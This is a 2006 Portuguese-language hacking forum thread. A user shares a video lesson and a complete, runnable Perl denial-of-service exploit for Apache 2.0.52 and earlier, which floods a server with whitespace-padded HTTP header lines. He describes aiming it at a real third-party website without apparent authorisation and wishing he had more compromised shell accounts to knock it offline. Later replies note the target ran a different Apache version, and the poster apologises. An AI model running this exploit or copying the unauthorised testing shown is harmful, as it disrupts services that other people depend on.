[Vídeo-Aula] DoS Apache 2.0.52 ou menor

Started by slul, 03 de June , 2006, 01:25:03 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

slul

daew pessoal fiz um videozin ai pra galera ver de demonstração de xpl

mais uma vez usei como cobaia o invasao.com.br

aqui fica o link:

http://nathan.ueuo.com/dosapache.htm

e aqui fika o xpl;

#!/usr/bin/perl

# Based on ->
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#   
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
#                         
#             By default parameter trys = 8000, for DoS Apache web servers on windows system try to
#             increase this parameter.
#
#             For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
#             C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              <+> Prepare to start connect.
#              <+> Connected to 127.0.0.1
#              <+> Send of first part of devil header.
#              <+> Prepare to DoS with 10000 trys.
#              <+> Start DoS second part of devil header.
#              <SOD> |====================> <EOD>
#              <+> Ok now target web server maybe DoSeD.
#
#
# Note ->   
#           
#             If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
#             And if you see "Eror 500" you are lucky man :)
#
# Warnings ->
#             This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or
#             use it for attack, or others things. 
#
# Shit ->
#             My English now is bulls shit :( I try study it :)
#           
# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.
# Contact to me at greenwood3[AT]yandex[dot]ru

use IO::Socket;

if (@ARGV <1)
  {
   print "\n ::: ---------------------------------------------- :::\n";
   print " ::: Another yet DoS exploit for Apache <= 2.0.52   :::\n";
   print " ::: Usage:  ap2.0.52_dos.pl <ip> [trys]            :::\n";
   print " ::: Coded by GreenwooD from Network Security Team  :::\n";
   print " ::: ---------------------------------------------- :::\n";
   exit();
  }

print "\n <+> Prepare to start connect.\n";

$s = IO::Socket::INET->new(Proto=>"tcp",
                            PeerAddr=>$ARGV[0],
                            PeerPort=>80,
                            Timeout=>6
                            ) or die " <-> Target web server already DoSeD ??? or can't connect :(\n";
  $s->autoflush();

print " <+> Connected to $ARGV[0]\n";
print " <+> Send of first part of devil header.\n";   
 
  print $s "GET / HTTP/1.0\n";

$trys = 8000; # Default

if ($ARGV[1])
{
  $trys = $ARGV[1];
}

print " <+> Prepare to DoS with $trys trys.\n";
print " <+> Start DoS send second part of devil header.\n";   
print " <SOD> |";

$i=0;

 do {

     print $s (" " x 8000 . "\n");

   
      if ($i % 500 == 0)
        {
         print "=";
        } 

     ++$i;

    } until ($i == $trys);


print "> <EOD>\n";

close($s);

print " <+> Ok now target web server maybe DoSeD.\n";



no video eu soh fiz o server fikar lagged a lot pq eu nao tinha mais shells pra meter ele no chao =)

o xpl eh feito em perl ele "Headers do demonio" com diz no xpl pra derruba o server

bem eh isso ai espero q gostem

flw

qq duvida me questionem

nibbles




"A diversão do inteligente é se fingir de burro para aquele que se finge de inteligente."
"ENGENHARIA SOCIAL. Porque não existe patch para a ignorância humana."

slul

http://nathan.ueuo.com/dosapache.swf

tenta ir no link direto =/

po kra aki abriu da primeira vez depois n abriu mais essa merda =(


bloodrain

hahahahhahha massa pelo menos o exploit
deixei o kurumim mais novo baixando ontem meia noite meu pai reclamou pq tava levando a banda ai eu agendei pra 1 mas ele nao reiniciou pq tava pausado haahahahahah deixei hj de manha qndo terminar eu volto pra assistir e comentar ^^

nibbles

boa slul, agora deu certo uhasuhsa :D
ta bem dahora, usou que programa pra gravar no linux?



"A diversão do inteligente é se fingir de burro para aquele que se finge de inteligente."
"ENGENHARIA SOCIAL. Porque não existe patch para a ignorância humana."

Anonymous

Muito boa sua video aula de boa qualidade, você foi direto ao assunto sem enrolar, você esta de parabéns.... ;)


_w4nKSt4_

Parabens pela video aula slul!!

Bem explicada...e irônica também heheehehehe

"Vixi jah ta bem lento neh

=)

ai ai

q demora e olha q eu jah tava com as img em cache"


auhhahuauahuahuauh

Anonymous

Quanto ao vídeo, bem feito!
Quanto ao exploit, é bem claro quanto a versão que atinge, ou seja, "Apache WebServer 2.052", permitindo ataques causando DoS (consumação de CPU) via HTTP GET requisitado o cabeçalho MIME contendo multiplas linhas com um largo numero de caracteres "Espaço"...
Em resumo, a versão do Apache (v.1.3.36) contida no site discriminado a falha (invasao.com.br) difere, portanto, "tiro na água", o exploit não atingiria a contento seu objetivo.

slul

Quote from: "justiceiro"Quanto ao vídeo, bem feito!
Quanto ao exploit, é bem claro quanto a versão que atinge, ou seja, "Apache WebServer 2.052", permitindo ataques causando DoS (consumação de CPU) via HTTP GET requisitado o cabeçalho MIME contendo multiplas linhas com um largo numero de caracteres "Espaço"...
Em resumo, a versão do Apache (v.1.3.36) contida no site discriminado a falha (invasao.com.br) difere, portanto, "tiro na água", o exploit não atingiria a contento seu objetivo.


Sim justiceiro foi uma falha minha!

eu confundi pq o invasao ficou mais lento mas toda a internet ficou mais lenta com a utilização desse exploit.

Abraços e obrigado pela citação

PS: Algum moderador tranca me arrependi de ter feito a vídeo-aula

principalmente por ter utilizado o invasao.com.br ...

Parece que eles não gostaram muito...

:/


Desculpas aí pessoal

principalmente

pro Thorking e pro souzaDC

Anonymous

Como não é liberado a opção de editar uma postagem, estou complementando a postagem anteriormente colocada por mim.

Realmente o exploit (em perl), fora feito para Apache MENOR ou IGUAL a 2.052, levando a crer realmente que tem que ter muita "Cancha" para derrubar o servidor, ou algum sistema de defesa do servidor tenha evitado, quem sabe em uma próxima vez, como vc disse, com mais "contas Shell"...

DarkGenesis